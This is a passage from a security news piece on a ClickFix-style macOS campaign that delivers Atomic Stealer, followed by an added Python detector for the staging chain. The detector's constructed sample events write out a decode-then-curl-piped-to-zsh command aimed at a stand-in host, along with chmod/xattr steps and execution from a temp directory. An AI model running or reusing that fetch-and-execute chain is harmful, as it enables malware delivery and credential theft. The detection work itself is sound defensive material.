Lightweight staging for Atomic Stealer: Once executed, the AppleScript resolves to an obfuscated shell command. That command decodes a hidden URL, retrieves a remote payload with curl, and executes it via zsh. From there, the standard infostealer flow takes over: a Mach-O binary is written to a temporary location, its file attributes are adjusted, executable permissions are set, and it is launched. That binary is a new variant of Atomic Stealer.

The researchers noted that this staging approach keeps the initial script minimal and less detectable, while the actual malicious logic arrives separately. It is modular, quick to update, and harder to catch at the first stage.

Atomic Stealer's objectives are consistent with earlier macOS infostealer campaigns, which focused on harvesting browser credentials, saved passwords, cryptocurrency wallet data, and developer artifacts. Previous reporting has shown that such stealers rarely operate in isolation: exfiltrated data is almost always funneled into credential-reuse attacks and account takeovers.
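Because the first stage carries no payload and the URL it decodes can be rotated at will, blocking the script itself buys little; the durable signal is the host behaviour the chain above describes. The following is an added example, not code from the CSO Online article or from the researchers it cites: a small Python detector run over constructed macOS process-execution events. The event fields, process names, the example.invalid URL and the /private/tmp/.update path are all assumptions made for illustration. It decodes base64 blobs in command lines to recover hidden URLs, looks for a curl (or wget) fetch piped into a shell, and for xattr/chmod activity and execution out of a temporary directory, all underneath an osascript process; it reports a chain only when at least three of those stages are seen, so a single missing telemetry record does not silence it.

```python
"""Flag a ClickFix-style staging chain (osascript -> shell -> curl | zsh -> exec from tmp)
in process-execution telemetry. Added example; the sample events below are constructed."""
import base64
import os
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    exe: str       # path of the image that was executed
    cmdline: str   # full command line as observed


# Hypothetical hidden URL; encoded here so the detector has a blob to decode.
HIDDEN_URL = "https://example.invalid/payload"
ENCODED_URL = base64.b64encode(HIDDEN_URL.encode()).decode()

# Constructed sample telemetry (not real captures): one malicious chain plus benign noise.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "/Applications/Safari.app/Contents/MacOS/Safari", "Safari"),
    ProcEvent(101, 100, "/usr/bin/osascript", "osascript -e 'do shell script \"...\"'"),
    ProcEvent(102, 101, "/bin/sh",
              f"sh -c 'echo {ENCODED_URL} | base64 -d | xargs curl -fsSL | zsh'"),
    ProcEvent(103, 102, "/usr/bin/curl", f"curl -fsSL {HIDDEN_URL}"),
    ProcEvent(104, 102, "/bin/zsh", "zsh"),
    ProcEvent(105, 104, "/usr/bin/xattr", "xattr -c /private/tmp/.update"),
    ProcEvent(106, 104, "/bin/chmod", "chmod +x /private/tmp/.update"),
    ProcEvent(107, 104, "/private/tmp/.update", "/private/tmp/.update"),
    # Benign: a developer fetching a file from Terminal, and a harmless osascript run.
    ProcEvent(200, 1, "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "Terminal"),
    ProcEvent(201, 200, "/bin/zsh", "zsh -l"),
    ProcEvent(202, 201, "/usr/bin/curl", "curl -O https://example.invalid/file.tar.gz"),
    ProcEvent(300, 1, "/usr/bin/osascript", "osascript /Users/dev/scripts/resize.scpt"),
    ProcEvent(301, 300, "/usr/bin/open", "open -a Preview"),
]

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"^https?://\S+$")
FETCH_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(zsh|bash|sh)\b")
TMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
MIN_STAGES = 3  # tolerate one or two missing records before we stop reporting


def decode_hidden_urls(cmdline: str) -> list[str]:
    """Recover URLs hidden in base64 blobs inside a command line; ignore non-decodable runs."""
    urls = []
    for blob in B64_RE.findall(cmdline):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # bad padding/alphabet or not text
            continue
        if URL_RE.match(text):
            urls.append(text)
    return urls


def find_clickfix_chains(events: list[ProcEvent]) -> list[dict]:
    """Return one finding per osascript process whose descendants show the staged chain."""
    children: dict[int, list[ProcEvent]] = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    def descendants(pid: int) -> list[ProcEvent]:
        out, stack = [], list(children.get(pid, []))
        while stack:
            e = stack.pop(0)
            out.append(e)
            stack.extend(children.get(e.pid, []))
        return out

    findings = []
    for root in events:
        if os.path.basename(root.exe) != "osascript":
            continue
        stages: dict[str, str] = {}
        for d in descendants(root.pid):
            name = os.path.basename(d.exe)
            urls = decode_hidden_urls(d.cmdline)
            if urls:
                stages["decoded_url"] = urls[0]
            if FETCH_TO_SHELL_RE.search(d.cmdline):
                stages["fetch_piped_to_shell"] = d.cmdline
            if name == "xattr" and any(p in d.cmdline for p in TMP_PREFIXES):
                stages["xattr_on_tmp"] = d.cmdline
            if name == "chmod" and "+x" in d.cmdline and any(p in d.cmdline for p in TMP_PREFIXES):
                stages["chmod_exec_tmp"] = d.cmdline
            if d.exe.startswith(TMP_PREFIXES):
                stages["exec_from_tmp"] = d.exe
        if len(stages) >= MIN_STAGES:
            findings.append({"osascript_pid": root.pid, "stages": stages})
    return findings


if __name__ == "__main__":
    for f in find_clickfix_chains(SAMPLE_EVENTS):
        print(f"osascript pid {f['osascript_pid']}: {', '.join(f['stages'])}")
```

The parent/child walk is what makes this more than a grep: a lone curl-to-shell pipe in a developer's Terminal session is noise, but the same pipe under osascript, followed by an xattr or chmod on a temp path and a launch from it, is the chain the article describes. Wire the same logic over Endpoint Security or EDR process events rather than the constructed list, and tune MIN_STAGES to what your telemetry reliably records.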
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4156500/new-clickfix-variant-bypasses-apple-safeguards-with-one%e2%80%91click-script-execution.html

